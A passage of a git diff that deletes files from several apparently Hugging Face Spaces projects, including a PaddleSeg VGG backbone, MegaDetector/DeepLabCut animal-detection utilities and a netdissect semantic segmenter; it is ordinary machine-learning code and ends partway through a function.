diff --git a/spaces/DQChoi/gpt-demo/venv/lib/python3.11/site-packages/gradio/templates/frontend/assets/index-8f1feca1.css b/spaces/DQChoi/gpt-demo/venv/lib/python3.11/site-packages/gradio/templates/frontend/assets/index-8f1feca1.css
deleted file mode 100644
index 1b457869043e5e2005c2331cb14abed07b7f6a88..0000000000000000000000000000000000000000
--- a/spaces/DQChoi/gpt-demo/venv/lib/python3.11/site-packages/gradio/templates/frontend/assets/index-8f1feca1.css
+++ /dev/null
@@ -1 +0,0 @@
-span.svelte-s1r2yt{font-weight:var(--section-header-text-weight);font-size:var(--section-header-text-size)}.label-wrap.svelte-s1r2yt{display:flex;justify-content:space-between;cursor:pointer;width:var(--size-full)}.label-wrap.open.svelte-s1r2yt{margin-bottom:var(--size-2)}.icon.svelte-s1r2yt{transition:.15s}
diff --git a/spaces/DaFujaTyping/hf-Chat-ui/src/lib/utils/trimPrefix.ts b/spaces/DaFujaTyping/hf-Chat-ui/src/lib/utils/trimPrefix.ts
deleted file mode 100644
index d006e66deca639f3f4d208e77a64ba368fab00ee..0000000000000000000000000000000000000000
--- a/spaces/DaFujaTyping/hf-Chat-ui/src/lib/utils/trimPrefix.ts
+++ /dev/null
@@ -1,6 +0,0 @@
-export function trimPrefix(input: string, prefix: string) {
- if (input.startsWith(prefix)) {
- return input.slice(prefix.length);
- }
- return input;
-}
diff --git a/spaces/DeepDrivePL/PaddleSeg-Matting/matting/model/vgg.py b/spaces/DeepDrivePL/PaddleSeg-Matting/matting/model/vgg.py
deleted file mode 100644
index 64b529bf0c3e25cb82ea4b4c31bec9ef30d2da59..0000000000000000000000000000000000000000
--- a/spaces/DeepDrivePL/PaddleSeg-Matting/matting/model/vgg.py
+++ /dev/null
@@ -1,166 +0,0 @@
-# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-
-import paddle
-from paddle import ParamAttr
-import paddle.nn as nn
-import paddle.nn.functional as F
-from paddle.nn import Conv2D, BatchNorm, Linear, Dropout
-from paddle.nn import AdaptiveAvgPool2D, MaxPool2D, AvgPool2D
-
-from paddleseg.cvlibs import manager
-from paddleseg.utils import utils
-
-
-class ConvBlock(nn.Layer):
- def __init__(self, input_channels, output_channels, groups, name=None):
- super(ConvBlock, self).__init__()
-
- self.groups = groups
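-        # `groups` is the number of stacked 3x3 convs in this block (1 to 4),
-        # mirroring the VGG-11/13/16/19 stage configurations.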
- self._conv_1 = Conv2D(
- in_channels=input_channels,
- out_channels=output_channels,
- kernel_size=3,
- stride=1,
- padding=1,
- weight_attr=ParamAttr(name=name + "1_weights"),
- bias_attr=False)
- if groups == 2 or groups == 3 or groups == 4:
- self._conv_2 = Conv2D(
- in_channels=output_channels,
- out_channels=output_channels,
- kernel_size=3,
- stride=1,
- padding=1,
- weight_attr=ParamAttr(name=name + "2_weights"),
- bias_attr=False)
- if groups == 3 or groups == 4:
- self._conv_3 = Conv2D(
- in_channels=output_channels,
- out_channels=output_channels,
- kernel_size=3,
- stride=1,
- padding=1,
- weight_attr=ParamAttr(name=name + "3_weights"),
- bias_attr=False)
- if groups == 4:
- self._conv_4 = Conv2D(
- in_channels=output_channels,
- out_channels=output_channels,
- kernel_size=3,
- stride=1,
- padding=1,
- weight_attr=ParamAttr(name=name + "4_weights"),
- bias_attr=False)
-
- self._pool = MaxPool2D(
- kernel_size=2, stride=2, padding=0, return_mask=True)
-
- def forward(self, inputs):
- x = self._conv_1(inputs)
- x = F.relu(x)
- if self.groups == 2 or self.groups == 3 or self.groups == 4:
- x = self._conv_2(x)
- x = F.relu(x)
- if self.groups == 3 or self.groups == 4:
- x = self._conv_3(x)
- x = F.relu(x)
- if self.groups == 4:
- x = self._conv_4(x)
- x = F.relu(x)
- skip = x
- x, max_indices = self._pool(x)
- return x, max_indices, skip
-
-
-class VGGNet(nn.Layer):
- def __init__(self, input_channels=3, layers=11, pretrained=None):
- super(VGGNet, self).__init__()
- self.pretrained = pretrained
-
- self.layers = layers
- self.vgg_configure = {
- 11: [1, 1, 2, 2, 2],
- 13: [2, 2, 2, 2, 2],
- 16: [2, 2, 3, 3, 3],
- 19: [2, 2, 4, 4, 4]
- }
- assert self.layers in self.vgg_configure.keys(), \
- "supported layers are {} but input layer is {}".format(
- self.vgg_configure.keys(), layers)
- self.groups = self.vgg_configure[self.layers]
-
-        # The first conv block of the matting model takes a 4-channel input; its weights are initialized directly to 0.
- self._conv_block_1 = ConvBlock(
- input_channels, 64, self.groups[0], name="conv1_")
- self._conv_block_2 = ConvBlock(64, 128, self.groups[1], name="conv2_")
- self._conv_block_3 = ConvBlock(128, 256, self.groups[2], name="conv3_")
- self._conv_block_4 = ConvBlock(256, 512, self.groups[3], name="conv4_")
- self._conv_block_5 = ConvBlock(512, 512, self.groups[4], name="conv5_")
-
-        # This layer should be initialized from the converted VGG fc6 weights; initialization can be skipped for now.
- self._conv_6 = Conv2D(
- 512, 512, kernel_size=3, padding=1, bias_attr=False)
-
- self.init_weight()
-
- def forward(self, inputs):
- fea_list = []
- ids_list = []
- x, ids, skip = self._conv_block_1(inputs)
- fea_list.append(skip)
- ids_list.append(ids)
- x, ids, skip = self._conv_block_2(x)
- fea_list.append(skip)
- ids_list.append(ids)
- x, ids, skip = self._conv_block_3(x)
- fea_list.append(skip)
- ids_list.append(ids)
- x, ids, skip = self._conv_block_4(x)
- fea_list.append(skip)
- ids_list.append(ids)
- x, ids, skip = self._conv_block_5(x)
- fea_list.append(skip)
- ids_list.append(ids)
- x = F.relu(self._conv_6(x))
- fea_list.append(x)
- return fea_list
-
- def init_weight(self):
- if self.pretrained is not None:
- utils.load_pretrained_model(self, self.pretrained)
-
-
-@manager.BACKBONES.add_component
-def VGG11(**args):
- model = VGGNet(layers=11, **args)
- return model
-
-
-@manager.BACKBONES.add_component
-def VGG13(**args):
- model = VGGNet(layers=13, **args)
- return model
-
-
-@manager.BACKBONES.add_component
-def VGG16(**args):
- model = VGGNet(layers=16, **args)
- return model
-
-
-@manager.BACKBONES.add_component
-def VGG19(**args):
- model = VGGNet(layers=19, **args)
- return model
diff --git a/spaces/DeepLabCut/MegaDetector_DeepLabCut/detection_utils.py b/spaces/DeepLabCut/MegaDetector_DeepLabCut/detection_utils.py
deleted file mode 100644
index ff53cdbbe7cb640dde9cbcb8eee38d48c1d4ae8e..0000000000000000000000000000000000000000
--- a/spaces/DeepLabCut/MegaDetector_DeepLabCut/detection_utils.py
+++ /dev/null
@@ -1,116 +0,0 @@
-
-from tkinter import W
-import gradio as gr
-from matplotlib import cm
-import torch
-import torchvision
-from dlclive import DLCLive, Processor
-import matplotlib
-from PIL import Image, ImageColor, ImageFont, ImageDraw
-import numpy as np
-import math
-
-
-import yaml
-import pdb
-
-############################################
-# Predict detections with MegaDetector v5a model
-def predict_md(im,
- megadetector_model, #Megadet_Models[mega_model_input]
- size=640):
-
- # resize image
-    g = (size / max(im.size))  # multiplying factor to make the max side of the image equal to the input size
- im = im.resize((int(x * g) for x in im.size),
- Image.ANTIALIAS) # resize
- # device
- if torch.cuda.is_available():
- md_device = torch.device('cuda')
- else:
- md_device = torch.device('cpu')
-
- # megadetector
- MD_model = torch.hub.load('ultralytics/yolov5', # repo_or_dir
- 'custom', #model
- megadetector_model, # args for callable model
- force_reload=True,
- device=md_device)
-
- # send model to gpu if possible
- if (md_device == torch.device('cuda')):
- print('Sending model to GPU')
- MD_model.to(md_device)
-
- ## detect objects
- results = MD_model(im) # inference # vars(results).keys()= dict_keys(['imgs', 'pred', 'names', 'files', 'times', 'xyxy', 'xywh', 'xyxyn', 'xywhn', 'n', 't', 's'])
-
- return results
-
-
-##########################################
-def crop_animal_detections(img_in,
- yolo_results,
- likelihood_th):
-
- ## Extract animal crops
- list_labels_as_str = [i for i in yolo_results.names.values()] # ['animal', 'person', 'vehicle']
- list_np_animal_crops = []
-
- # image to crop (scale as input for megadetector)
- img_in = img_in.resize((yolo_results.ims[0].shape[1],
- yolo_results.ims[0].shape[0]))
- # for every detection in the img
- for det_array in yolo_results.xyxy:
-
- # for every detection
- for j in range(det_array.shape[0]):
-
- # compute coords around bbox rounded to the nearest integer (for pasting later)
- xmin_rd = int(math.floor(det_array[j,0])) # int() should suffice?
- ymin_rd = int(math.floor(det_array[j,1]))
-
- xmax_rd = int(math.ceil(det_array[j,2]))
- ymax_rd = int(math.ceil(det_array[j,3]))
-
- pred_llk = det_array[j,4]
- pred_label = det_array[j,5]
- # keep animal crops above threshold
- if (pred_label == list_labels_as_str.index('animal')) and \
- (pred_llk >= likelihood_th):
- area = (xmin_rd, ymin_rd, xmax_rd, ymax_rd)
-
- #pdb.set_trace()
- crop = img_in.crop(area) #Image.fromarray(img_in).crop(area)
- crop_np = np.asarray(crop)
-
- # add to list
- list_np_animal_crops.append(crop_np)
-
- return list_np_animal_crops
-
-##########################################
-def predict_dlc(list_np_crops,
- kpts_likelihood_th,
- DLCmodel,
- dlc_proc):
-
- # run dlc thru list of crops
- dlc_live = DLCLive(DLCmodel, processor=dlc_proc)
- dlc_live.init_inference(list_np_crops[0])
-
- list_kpts_per_crop = []
- all_kypts = []
- np_aux = np.empty((1,3)) # can I avoid hardcoding here?
- for crop in list_np_crops:
- # scale crop here?
- keypts_xyp = dlc_live.get_pose(crop) # third column is llk!
-        # set kpts below threshold to nan
-
- #pdb.set_trace()
-        keypts_xyp[keypts_xyp[:, -1] < kpts_likelihood_th, :] = np.nan
- # add kpts of this crop to list
- list_kpts_per_crop.append(keypts_xyp)
- all_kypts.append(keypts_xyp)
-
- return list_kpts_per_crop
\ No newline at end of file
diff --git a/spaces/DeepLabCut/MegaDetector_DeepLabCut/save_results.py b/spaces/DeepLabCut/MegaDetector_DeepLabCut/save_results.py
deleted file mode 100644
index bb4b28fd4622792b164a724f6300484896fae8e9..0000000000000000000000000000000000000000
--- a/spaces/DeepLabCut/MegaDetector_DeepLabCut/save_results.py
+++ /dev/null
@@ -1,56 +0,0 @@
-import json
-import numpy as np
-import pdb
-
-dict_pred = {0: 'animal', 1: 'person', 2: 'vehicle'}
-
-
-def save_results(md_results, dlc_outputs, map_label_id_to_str, thr, output_file='download_predictions.json'):
- """
- Write the MegaDetector and DLC predictions to a JSON file.
- """
- info = {}
- ## info megaDetector
- info['file']= md_results.files[0]
- number_bb = len(md_results.xyxy[0].tolist())
- info['number_of_bb'] = number_bb
- number_bb_thr = len(dlc_outputs)
- labels = [n for n in map_label_id_to_str.values()]
- #pdb.set_trace()
- new_index = []
- for i in range(number_bb):
- corner_x1,corner_y1,corner_x2,corner_y2,confidence, _ = md_results.xyxy[0].tolist()[i]
-
- if confidence > thr:
- new_index.append(i)
-
-
- for i in range(number_bb_thr):
- aux={}
- corner_x1,corner_y1,corner_x2,corner_y2,confidence, _ = md_results.xyxy[0].tolist()[new_index[i]]
- aux['corner_1'] = (corner_x1,corner_y1)
- aux['corner_2'] = (corner_x2,corner_y2)
- aux['predict MD'] = md_results.names[0]
- aux['confidence MD'] = confidence
-
- ## info dlc
- kypts = []
- for s in dlc_outputs[i]:
- aux1 = []
- for j in s:
- aux1.append(float(j))
-
- kypts.append(aux1)
- aux['dlc_pred'] = dict(zip(labels,kypts))
- info['bb_' + str(new_index[i]) ]=aux
-
-
- with open(output_file, 'w') as f:
- json.dump(info, f, indent=1)
- print('Output file saved at {}'.format(output_file))
-
- return output_file
-
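-# Illustrative call (added as a sketch, not from the original file): `md_results` is the
-# MegaDetector output and `dlc_outputs` the per-crop keypoint arrays; the threshold is a
-# placeholder value.
-# save_results(md_results, dlc_outputs, dict_pred, thr=0.8)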
diff --git a/spaces/Dinoking/Guccio-AI-Designer/netdissect/segmenter.py b/spaces/Dinoking/Guccio-AI-Designer/netdissect/segmenter.py
deleted file mode 100644
index e5ebe364bc30f32581f0d560e11f08bfbd0d1731..0000000000000000000000000000000000000000
--- a/spaces/Dinoking/Guccio-AI-Designer/netdissect/segmenter.py
+++ /dev/null
@@ -1,581 +0,0 @@
-# Usage as a simple differentiable segmenter base class
-
-import os, torch, numpy, json, glob
-import skimage.morphology
-from collections import OrderedDict
-from netdissect import upsegmodel
-from netdissect import segmodel as segmodel_module
-from netdissect.easydict import EasyDict
-from urllib.request import urlretrieve
-
-class BaseSegmenter:
- def get_label_and_category_names(self):
- '''
- Returns two lists: first, a list of tuples [(label, category), ...]
- where the label and category are human-readable strings indicating
- the meaning of a segmentation class. The 0th segmentation class
- should be reserved for a label ('-') that means "no prediction."
- The second list should just be a list of [category,...] listing
- all categories in a canonical order.
- '''
- raise NotImplementedError()
-
- def segment_batch(self, tensor_images, downsample=1):
- '''
- Returns a multilabel segmentation for the given batch of (RGB [-1...1])
- images. Each pixel of the result is a torch.long indicating a
- predicted class number. Multiple classes can be predicted for
- the same pixel: output shape is (n, multipred, y, x), where
- multipred is 3, 5, or 6, for how many different predicted labels can
- be given for each pixel (depending on whether subdivision is being
- used). If downsample is specified, then the output y and x dimensions
- are downsampled from the original image.
- '''
- raise NotImplementedError()
-
- def predict_single_class(self, tensor_images, classnum, downsample=1):
- '''
- Given a batch of images (RGB, normalized to [-1...1]) and
- a specific segmentation class number, returns a tuple with
- (1) a differentiable ([0..1]) prediction score for the class
- at every pixel of the input image.
- (2) a binary mask showing where in the input image the
- specified class is the best-predicted label for the pixel.
- Does not work on subdivided labels.
- '''
- raise NotImplementedError()
-
-class UnifiedParsingSegmenter(BaseSegmenter):
- '''
- This is a wrapper for a more complicated multi-class segmenter,
- as described in https://arxiv.org/pdf/1807.10221.pdf, and as
- released in https://github.com/CSAILVision/unifiedparsing.
- For our purposes and to simplify processing, we do not use
- whole-scene predictions, and we only consume part segmentations
- for the three largest object classes (sky, building, person).
- '''
-
- def __init__(self, segsizes=None, segdiv=None):
- # Create a segmentation model
- if segsizes is None:
- segsizes = [256]
- if segdiv is None:
- segdiv = 'undivided'
- segvocab = 'upp'
- segarch = ('resnet50', 'upernet')
- epoch = 40
- segmodel = load_unified_parsing_segmentation_model(
- segarch, segvocab, epoch)
- segmodel.cuda()
- self.segmodel = segmodel
- self.segsizes = segsizes
- self.segdiv = segdiv
- mult = 1
- if self.segdiv == 'quad':
- mult = 5
- self.divmult = mult
- # Assign class numbers for parts.
- first_partnumber = (
- (len(segmodel.labeldata['object']) - 1) * mult + 1 +
- (len(segmodel.labeldata['material']) - 1))
- # We only use parts for these three types of objects, for efficiency.
- partobjects = ['sky', 'building', 'person']
- partnumbers = {}
- partnames = []
- objectnumbers = {k: v
- for v, k in enumerate(segmodel.labeldata['object'])}
- part_index_translation = []
- # We merge some classes. For example "door" is both an object
- # and a part of a building. To avoid confusion, we just count
- # such classes as objects, and add part scores to the same index.
- for owner in partobjects:
- part_list = segmodel.labeldata['object_part'][owner]
- numeric_part_list = []
- for part in part_list:
- if part in objectnumbers:
- numeric_part_list.append(objectnumbers[part])
- elif part in partnumbers:
- numeric_part_list.append(partnumbers[part])
- else:
- partnumbers[part] = len(partnames) + first_partnumber
- partnames.append(part)
- numeric_part_list.append(partnumbers[part])
- part_index_translation.append(torch.tensor(numeric_part_list))
- self.objects_with_parts = [objectnumbers[obj] for obj in partobjects]
- self.part_index = part_index_translation
- self.part_names = partnames
- # For now we'll just do object and material labels.
- self.num_classes = 1 + (
- len(segmodel.labeldata['object']) - 1) * mult + (
- len(segmodel.labeldata['material']) - 1) + len(partnames)
- self.num_object_classes = len(self.segmodel.labeldata['object']) - 1
-
- def get_label_and_category_names(self, dataset=None):
- '''
- Lists label and category names.
- '''
- # Labels are ordered as follows:
- # 0, [object labels] [divided object labels] [materials] [parts]
- # The zero label is reserved to mean 'no prediction'.
- if self.segdiv == 'quad':
- suffixes = ['t', 'l', 'b', 'r']
- else:
- suffixes = []
- divided_labels = []
- for suffix in suffixes:
- divided_labels.extend([('%s-%s' % (label, suffix), 'part')
- for label in self.segmodel.labeldata['object'][1:]])
- # Create the whole list of labels
- labelcats = (
- [(label, 'object')
- for label in self.segmodel.labeldata['object']] +
- divided_labels +
- [(label, 'material')
- for label in self.segmodel.labeldata['material'][1:]] +
- [(label, 'part') for label in self.part_names])
- return labelcats, ['object', 'part', 'material']
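- # A quick sketch of the shared numbering implied above (added for illustration):
- # with segdiv == 'quad' (divmult == 5), a raw material index m maps to
- # m + (num_objects - 1) * 5, and the first part label sits at
- # (num_objects - 1) * 5 + 1 + (num_materials - 1), matching first_partnumber
- # in __init__ and the material offset applied in segment_batch.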
-
- def raw_seg_prediction(self, tensor_images, downsample=1):
- '''
- Generates a segmentation by applying multiresolution voting on
- the segmentation model, using a set of resolutions (rounded to
- multiples of 32 pixels) as in the example benchmark code.
- '''
- y, x = tensor_images.shape[2:]
- b = len(tensor_images)
- tensor_images = (tensor_images + 1) / 2 * 255
- tensor_images = torch.flip(tensor_images, (1,)) # BGR!!!?
- tensor_images -= torch.tensor([102.9801, 115.9465, 122.7717]).to(
- dtype=tensor_images.dtype, device=tensor_images.device
- )[None,:,None,None]
- seg_shape = (y // downsample, x // downsample)
- # We want these to be multiples of 32 for the model.
- sizes = [(s, s) for s in self.segsizes]
- pred = {category: torch.zeros(
- len(tensor_images), len(self.segmodel.labeldata[category]),
- seg_shape[0], seg_shape[1]).cuda()
- for category in ['object', 'material']}
- part_pred = {partobj_index: torch.zeros(
- len(tensor_images), len(partindex),
- seg_shape[0], seg_shape[1]).cuda()
- for partobj_index, partindex in enumerate(self.part_index)}
- for size in sizes:
- if size == tensor_images.shape[2:]:
- resized = tensor_images
- else:
- resized = torch.nn.AdaptiveAvgPool2d(size)(tensor_images)
- r_pred = self.segmodel(
- dict(img=resized), seg_size=seg_shape)
- for k in pred:
- pred[k] += r_pred[k]
- for k in part_pred:
- part_pred[k] += r_pred['part'][k]
- return pred, part_pred
-
- def segment_batch(self, tensor_images, downsample=1):
- '''
- Returns a multilabel segmentation for the given batch of (RGB [-1...1])
- images. Each pixel of the result is a torch.long indicating a
- predicted class number. Multiple classes can be predicted for
- the same pixel: output shape is (n, multipred, y, x), where
- multipred is 3, 5, or 6, for how many different predicted labels can
- be given for each pixel (depending on whether subdivision is being
- used). If downsample is specified, then the output y and x dimensions
- are downsampled from the original image.
- '''
- pred, part_pred = self.raw_seg_prediction(tensor_images,
- downsample=downsample)
- piece_channels = 2 if self.segdiv == 'quad' else 0
- y, x = tensor_images.shape[2:]
- seg_shape = (y // downsample, x // downsample)
- segs = torch.zeros(len(tensor_images), 3 + piece_channels,
- seg_shape[0], seg_shape[1],
- dtype=torch.long, device=tensor_images.device)
- _, segs[:,0] = torch.max(pred['object'], dim=1)
- # Get materials and translate to shared numbering scheme
- _, segs[:,1] = torch.max(pred['material'], dim=1)
- maskout = (segs[:,1] == 0)
- segs[:,1] += (len(self.segmodel.labeldata['object']) - 1) * self.divmult
- segs[:,1][maskout] = 0
- # Now deal with subparts of sky, buildings, people
- for i, object_index in enumerate(self.objects_with_parts):
- trans = self.part_index[i].to(segs.device)
- # Get the argmax, and then translate to shared numbering scheme
- seg = trans[torch.max(part_pred[i], dim=1)[1]]
- # Only trust the parts where the prediction also predicts the
- # owning object.
- mask = (segs[:,0] == object_index)
- segs[:,2][mask] = seg[mask]
-
- if self.segdiv == 'quad':
- segs = self.expand_segment_quad(segs, self.segdiv)
- return segs
-
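- # Sketch of consuming the output above (added; mirrors test_main at the bottom of
- # this file, with `segmenter` and `tensor_im` assumed to exist):
- # seg = segmenter.segment_batch(tensor_im) # (n, multipred, y, x), torch.long
- # counts = torch.bincount(seg.view(-1)) # pixels per shared label index
- # labels, cats = segmenter.get_label_and_category_names()
- # for idx in counts.nonzero()[:, 0]:
- # print(labels[idx.item()], counts[idx].item())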
- def predict_single_class(self, tensor_images, classnum, downsample=1):
- '''
- Given a batch of images (RGB, normalized to [-1...1]) and
- a specific segmentation class number, returns a tuple with
- (1) a differentiable ([0..1]) prediction score for the class
- at every pixel of the input image.
- (2) a binary mask showing where in the input image the
- specified class is the best-predicted label for the pixel.
- Does not work on subdivided labels.
- '''
- result = 0
- pred, part_pred = self.raw_seg_prediction(tensor_images,
- downsample=downsample)
- material_offset = (len(self.segmodel.labeldata['object']) - 1
- ) * self.divmult
- if material_offset < classnum < material_offset + len(
- self.segmodel.labeldata['material']):
- return (
- pred['material'][:, classnum - material_offset],
- pred['material'].max(dim=1)[1] == classnum - material_offset)
- mask = None
- if classnum < len(self.segmodel.labeldata['object']):
- result = pred['object'][:, classnum]
- mask = (pred['object'].max(dim=1)[1] == classnum)
- # Some objects, like 'door', are also a part of other objects,
- # so add the part prediction also.
- for i, object_index in enumerate(self.objects_with_parts):
- local_index = (self.part_index[i] == classnum).nonzero()
- if len(local_index) == 0:
- continue
- local_index = local_index.item()
- # Ignore part predictions outside the mask. (We could pay
- # attention to and penalize such predictions.)
- mask2 = (pred['object'].max(dim=1)[1] == object_index) * (
- part_pred[i].max(dim=1)[1] == local_index)
- if mask is None:
- mask = mask2
- else:
- mask = torch.max(mask, mask2)
- result = result + (part_pred[i][:, local_index])
- assert not isinstance(result, int), 'unrecognized class %d' % classnum
- return result, mask
-
- def expand_segment_quad(self, segs, segdiv='quad'):
- shape = segs.shape
- segs[:,3:] = segs[:,0:1] # start by copying the object channel
- num_seg_labels = self.num_object_classes
- # For every connected component present (using generator)
- for i, mask in component_masks(segs[:,0:1]):
- # Figure the bounding box of the label
- top, bottom = mask.any(dim=1).nonzero()[[0, -1], 0]
- left, right = mask.any(dim=0).nonzero()[[0, -1], 0]
- # Chop the bounding box into four parts
- vmid = (top + bottom + 1) // 2
- hmid = (left + right + 1) // 2
- # Construct top, bottom, right, left masks
- quad_mask = mask[None,:,:].repeat(4, 1, 1)
- quad_mask[0, vmid:, :] = 0 # top
- quad_mask[1, :, hmid:] = 0 # right
- quad_mask[2, :vmid, :] = 0 # bottom
- quad_mask[3, :, :hmid] = 0 # left
- quad_mask = quad_mask.long()
- # Modify extra segmentation labels by offsetting
- segs[i,3,:,:] += quad_mask[0] * num_seg_labels
- segs[i,4,:,:] += quad_mask[1] * (2 * num_seg_labels)
- segs[i,3,:,:] += quad_mask[2] * (3 * num_seg_labels)
- segs[i,4,:,:] += quad_mask[3] * (4 * num_seg_labels)
- # remove any components that were too small to subdivide
- mask = segs[:,3:] <= self.num_object_classes
- segs[:,3:][mask] = 0
- return segs
-
-class SemanticSegmenter(BaseSegmenter):
- def __init__(self, modeldir=None, segarch=None, segvocab=None,
- segsizes=None, segdiv=None, epoch=None):
- # Create a segmentation model
- if modeldir is None:
- modeldir = 'dataset/segmodel'
- if segvocab is None:
- segvocab = 'baseline'
- if segarch is None:
- segarch = ('resnet50_dilated8', 'ppm_bilinear_deepsup')
- if segdiv is None:
- segdiv = 'undivided'
- elif isinstance(segarch, str):
- segarch = segarch.split(',')
- segmodel = load_segmentation_model(modeldir, segarch, segvocab, epoch)
- if segsizes is None:
- segsizes = getattr(segmodel.meta, 'segsizes', [256])
- self.segsizes = segsizes
- # Verify that the segmentation model has every out_channel labeled.
- assert len(segmodel.meta.labels) == list(c for c in segmodel.modules()
- if isinstance(c, torch.nn.Conv2d))[-1].out_channels
- segmodel.cuda()
- self.segmodel = segmodel
- self.segdiv = segdiv
- # Image normalization
- self.bgr = (segmodel.meta.imageformat.byteorder == 'BGR')
- self.imagemean = torch.tensor(segmodel.meta.imageformat.mean)
- self.imagestd = torch.tensor(segmodel.meta.imageformat.stdev)
- # Map from labels to external indexes, and labels to channel sets.
- self.labelmap = {'-': 0}
- self.channelmap = {'-': []}
- self.labels = [('-', '-')]
- num_labels = 1
- self.num_underlying_classes = len(segmodel.meta.labels)
- # labelmap maps names to external indexes.
- for i, label in enumerate(segmodel.meta.labels):
- if label.name not in self.channelmap:
- self.channelmap[label.name] = []
- self.channelmap[label.name].append(i)
- if getattr(label, 'internal', None) or label.name in self.labelmap:
- continue
- self.labelmap[label.name] = num_labels
- num_labels += 1
- self.labels.append((label.name, label.category))
- # Each category gets its own independent softmax.
- self.category_indexes = { category.name:
- [i for i, label in enumerate(segmodel.meta.labels)
- if label.category == category.name]
- for category in segmodel.meta.categories }
- # catindexmap maps names to category internal indexes
- self.catindexmap = {}
- for catname, indexlist in self.category_indexes.items():
- for index, i in enumerate(indexlist):
- self.catindexmap[segmodel.meta.labels[i].name] = (
- (catname, index))
- # After the softmax, each category is mapped to external indexes.
- self.category_map = { catname:
- torch.tensor([
- self.labelmap.get(segmodel.meta.labels[ind].name, 0)
- for ind in catindex])
- for catname, catindex in self.category_indexes.items()}
- self.category_rules = segmodel.meta.categories
- # Finally, naive subdivision can be applied.
- mult = 1
- if self.segdiv == 'quad':
- mult = 5
- suffixes = ['t', 'l', 'b', 'r']
- divided_labels = []
- for suffix in suffixes:
- divided_labels.extend([('%s-%s' % (label, suffix), cat)
- for label, cat in self.labels[1:]])
- self.channelmap.update({
- '%s-%s' % (label, suffix): self.channelmap[label]
- for label, cat in self.labels[1:] })
- self.labels.extend(divided_labels)
- # For examining a single class
- self.channellist = [self.channelmap[name] for name, _ in self.labels]
-
- def get_label_and_category_names(self, dataset=None):
- return self.labels, self.segmodel.categories
-
- def segment_batch(self, tensor_images, downsample=1):
- return self.raw_segment_batch(tensor_images, downsample)[0]
-
- def raw_segment_batch(self, tensor_images, downsample=1):
- pred = self.raw_seg_prediction(tensor_images, downsample)
- catsegs = {}
- for catkey, catindex in self.category_indexes.items():
- _, segs = torch.max(pred[:, catindex], dim=1)
- catsegs[catkey] = segs
- masks = {}
- segs = torch.zeros(len(tensor_images), len(self.category_rules),
- pred.shape[2], pred.shape[3], device=pred.device,
- dtype=torch.long)
- for i, cat in enumerate(self.category_rules):
- catmap = self.category_map[cat.name].to(pred.device)
- translated = catmap[catsegs[cat.name]]
- if getattr(cat, 'mask', None) is not None:
- if cat.mask not in masks:
- maskcat, maskind = self.catindexmap[cat.mask]
- masks[cat.mask] = (catsegs[maskcat] == maskind)
- translated *= masks[cat.mask].long()
- segs[:,i] = translated
- if self.segdiv == 'quad':
- segs = self.expand_segment_quad(segs,
- self.num_underlying_classes, self.segdiv)
- return segs, pred
-
- def raw_seg_prediction(self, tensor_images, downsample=1):
- '''
- Generates a segmentation by applying multiresolution voting on
- the segmentation model, using a set of resolutions (rounded to
- multiples of 32 pixels) as in the example benchmark code.
- '''
- y, x = tensor_images.shape[2:]
- b = len(tensor_images)
- # Flip the RGB order if specified.
- if self.bgr:
- tensor_images = torch.flip(tensor_images, (1,))
- # Transform from our [-1..1] range to torch standard [0..1] range
- # and then apply normalization.
- tensor_images = ((tensor_images + 1) / 2
- ).sub_(self.imagemean[None,:,None,None].to(tensor_images.device)
- ).div_(self.imagestd[None,:,None,None].to(tensor_images.device))
- # Output shape can be downsampled.
- seg_shape = (y // downsample, x // downsample)
- # We want these to be multiples of 32 for the model.
- sizes = [(s, s) for s in self.segsizes]
- pred = torch.zeros(
- len(tensor_images), (self.num_underlying_classes),
- seg_shape[0], seg_shape[1]).cuda()
- for size in sizes:
- if size == tensor_images.shape[2:]:
- resized = tensor_images
- else:
- resized = torch.nn.AdaptiveAvgPool2d(size)(tensor_images)
- raw_pred = self.segmodel(
- dict(img_data=resized), segSize=seg_shape)
- softmax_pred = torch.empty_like(raw_pred)
- for catindex in self.category_indexes.values():
- softmax_pred[:, catindex] = torch.nn.functional.softmax(
- raw_pred[:, catindex], dim=1)
- pred += softmax_pred
- return pred
-
- def expand_segment_quad(self, segs, num_seg_labels, segdiv='quad'):
- shape = segs.shape
- output = segs.repeat(1, 3, 1, 1)
- # For every connected component present (using generator)
- for i, mask in component_masks(segs):
- # Figure the bounding box of the label
- top, bottom = mask.any(dim=1).nonzero()[[0, -1], 0]
- left, right = mask.any(dim=0).nonzero()[[0, -1], 0]
- # Chop the bounding box into four parts
- vmid = (top + bottom + 1) // 2
- hmid = (left + right + 1) // 2
- # Construct top, bottom, right, left masks
- quad_mask = mask[None,:,:].repeat(4, 1, 1)
- quad_mask[0, vmid:, :] = 0 # top
- quad_mask[1, :, hmid:] = 0 # right
- quad_mask[2, :vmid, :] = 0 # bottom
- quad_mask[3, :, :hmid] = 0 # left
- quad_mask = quad_mask.long()
- # Modify extra segmentation labels by offsetting
- output[i,1,:,:] += quad_mask[0] * num_seg_labels
- output[i,2,:,:] += quad_mask[1] * (2 * num_seg_labels)
- output[i,1,:,:] += quad_mask[2] * (3 * num_seg_labels)
- output[i,2,:,:] += quad_mask[3] * (4 * num_seg_labels)
- return output
-
- def predict_single_class(self, tensor_images, classnum, downsample=1):
- '''
- Given a batch of images (RGB, normalized to [-1...1]) and
- a specific segmentation class number, returns a tuple with
- (1) a differentiable ([0..1]) prediction score for the class
- at every pixel of the input image.
- (2) a binary mask showing where in the input image the
- specified class is the best-predicted label for the pixel.
- Does not work on subdivided labels.
- '''
- seg, pred = self.raw_segment_batch(tensor_images,
- downsample=downsample)
- result = pred[:,self.channellist[classnum]].sum(dim=1)
- mask = (seg == classnum).max(1)[0]
- return result, mask
-
-def component_masks(segmentation_batch):
- '''
- Splits connected components into regions (slower, requires cpu).
- '''
- npbatch = segmentation_batch.cpu().numpy()
- for i in range(segmentation_batch.shape[0]):
- labeled, num = skimage.morphology.label(npbatch[i][0], return_num=True)
- labeled = torch.from_numpy(labeled).to(segmentation_batch.device)
- for label in range(1, num + 1): # skimage labels run from 1 to num (0 is background)
- yield i, (labeled == label)
-
-def load_unified_parsing_segmentation_model(segmodel_arch, segvocab, epoch):
